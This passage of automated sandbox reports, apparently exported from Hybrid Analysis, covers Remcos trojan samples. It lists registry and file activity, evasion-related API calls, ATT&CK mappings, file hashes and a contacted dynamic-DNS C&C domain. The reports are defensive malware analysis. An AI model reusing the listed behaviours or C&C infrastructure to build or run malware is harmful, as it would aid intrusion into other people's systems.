\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\version.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe.Local\\\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\shcore.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\Windows\\system32\\shcore.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\Windows\\system\\shcore.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\Windows\\shcore.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to touch file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe.Local\\\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"\\Device\\RasAcd\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\B682969AA8FD146FC6D9E1C7F21FC0243C5FC2197103D117BB087CA6CBCB7B55.EXE.LOCAL\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" trying to access non-existent file \"C:\\ProgramData\\rmc\\REGISTROS.DAT\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" writes file \"c:\\programdata\\rmc\\registros.dat\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" writes file \"%allusersprofile%\\rmc\\registros.dat\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"registros.dat\" has type \"data\"- Location: [%ALLUSERSPROFILE%\\rmc\\registros.dat]- [targetUID: 00000000-00003032]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\RMC-E3OCRB\"; Key: \"OVERRIDE\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-189", "relevance": 5, "name": "Calls an APIs used to retrieve process information", "description": "Observed import api \"OpenProcessToken\" which can be \"used to retrieve process information\" [Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55]", "origin": "Static Parser", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003032)\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003032)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call EnumServicesStatusW@ADVAPI32.DLL directly followed by \"cmp dword ptr [esp+14h], esi\" and \"jbe 0041AAABh\" at 00000000-00003032-51990-1964-0041A7D9\n Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, FFFFFFFFh\" and \"je 00449511h\" at 00000000-00003032-51990-1066-004493E5", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003032)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003032)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-81", "type": 7, "relevance": 5, "name": "High entropy domain detected", "description": "Contacted domain: \"remcos2010.duckdns.org\" has high entropy", "origin": "Network Traffic", "attck_id": "T1568.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1568/002"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-52", "type": 7, "relevance": 1, "name": "Contacts Dynamic DNS (possible C&C communication)", "description": "\"remcos2010.duckdns.org\"", "origin": "Network Traffic", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-191", "relevance": 5, "name": "Calls an API used to open a process handle", "description": "Observed import api \"OpenProcess\" which can be \"used to open a process handle\" [Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-193", "relevance": 5, "name": "Calls an API used to change the configuration parameters of a service", "description": "Observed import api \"ChangeServiceConfig\" which can be \"used to change the configuration parameters of a service\" [Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55\" has a section named \".gfids\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"SleepConditionVariableCS\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNEL32.DLL)\n Found string \"FlsAlloc\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNELBASE.DLL)\n Found string \"FlsFree\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNELBASE.DLL)\n Found string \"FlsGetValue\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNELBASE.DLL)\n Found string \"FlsSetValue\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNELBASE.DLL)\n Found string \"InitializeCriticalSectionEx\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNELBASE.DLL)\n Found string \"InitOnceExecuteOnce\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNEL32.DLL)\n Found string \"CreateEventExW\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNELBASE.DLL)\n Found string \"CreateSemaphoreW\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNEL32.DLL)\n Found string \"CreateSemaphoreExW\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNELBASE.DLL)\n Found string \"CreateThreadpoolTimer\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNELBASE.DLL)\n Found string \"CreateThreadpoolWait\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNELBASE.DLL)\n Found string \"CreateSymbolicLinkW\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNEL32.DLL)\n Found string \"GetTickCount64\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNELBASE.DLL)\n Found string \"GetFileInformationByHandleEx\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNEL32.DLL)\n Found string \"SetFileInformationByHandle\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNELBASE.DLL)\n Found string \"SleepConditionVariableSRW\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNEL32.DLL)\n Found string \"CreateThreadpoolWork\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNELBASE.DLL)\n Found string \"CompareStringEx\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNELBASE.DLL)\n Found string \"GetLocaleInfoEx\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNELBASE.DLL)\n Found string \"LCMapStringEx\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNELBASE.DLL)\n Found string \"AreFileApisANSI\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNELBASE.DLL)\n Found string \"EnumSystemLocalesEx\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNELBASE.DLL)\n Found string \"GetDateFormatEx\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNEL32.DLL)\n Found string \"GetTimeFormatEx\" (Source: b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55, API is part of module: KERNEL32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55\" has section name .text with entropy \"6.6273936921798455\"\n \"b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55\" has section name .reloc with entropy \"6.723768218094163\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "stream-40", "type": 1, "relevance": 10, "name": "Looks up many procedures within the same disassembly stream (often used to hide usage)", "description": "Found 40 calls to GetProcAddress@KERNEL32.DLL at 00000000-00003032-51990-2771-00435EED", "origin": "Hybrid Analysis Technology", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2
https://hybrid-analysis.com/sample/e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2
Hybrid Analysis - Remcos
{"size": 494592, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2", "sha256": "e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2", "av_detect": 88, "vx_family": "Remcos.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 3, "total_signatures": 220, "extracted_files": [{"name": "remcos.exe", "file_path": "%ALLUSERSPROFILE%\\Remcos\\remcos.exe", "file_size": 494592, "sha256": "e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe (PID: 2984)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 22, "file_available_to_download": true}, {"name": "remcos.exe.bin", "file_size": 494592, "sha256": "e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2", "type_tags": ["peexe", "executable"], 